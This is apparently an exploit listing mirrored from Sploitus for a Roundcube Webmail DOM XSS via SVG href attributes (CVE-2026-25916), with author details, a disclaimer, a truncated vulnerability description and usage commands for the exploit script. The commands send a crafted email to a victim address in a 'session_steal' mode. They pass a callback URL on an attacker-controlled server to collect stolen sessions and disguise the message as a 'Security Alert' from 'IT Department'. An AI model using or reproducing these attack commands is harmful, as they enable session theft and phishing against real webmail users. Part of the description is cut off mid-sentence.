Share
## https://sploitus.com/exploit?id=B7141A99-3A8E-598A-ADC8-C802955FA311
# CVE-2026-25916: Roundcube Webmail DOM XSS Exploit

## ๐Ÿ“‹ Exploit Information
**Exploit Title:** Roundcube Webmail DOM XSS via SVG href (CVE-2026-25916)  
**Author:** Mohammed Idrees Banyamer  
**Contact:** [GitHub @mbanyamer](https://github.com/mbanyamer) | [Instagram @banyamer_security](https://instagram.com/banyamer_security)  
**Country:** Jordan  
**Date:** February 9, 2026  
**CVE:** CVE-2026-25916  
**Type:** DOM-based Cross-Site Scripting (XSS)  
**Platform:** Web Application  
**Tested on:** Roundcube 1.6.8, Ubuntu 22.04  
**CVSS Score:** 6.1 (Medium)  

## ๐Ÿšจ Legal Disclaimer
> **โš ๏ธ WARNING:** This exploit is for **educational and authorized testing purposes only**.  
> Use only on systems you own or have explicit written permission to test.  
> The author is not responsible for any misuse or illegal activities.

## ๐Ÿ“– Vulnerability Description
Roundcube Webmail versions before 1.6.9 contain a DOM-based XSS vulnerability in SVG handling. The application fails to properly sanitize `href` and `xlink:href` attributes in SVG elements, allowing JavaScript execution via specially crafted emails.

**Affected Versions:** Roundcube Webmail 




```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u your_email@gmail.com -w your_password -r victim@company.com
```
```bash
python3 cve-2026-25916.py \
  -s smtp.gmail.com \
  -p 587 \
  -u attacker@gmail.com \
  -w app_password \
  -r victim@company.com \
  -t session_steal \
  --callback https://yourserver.com/collect \
  --subject "Security Alert" \
  --from-name "IT Department"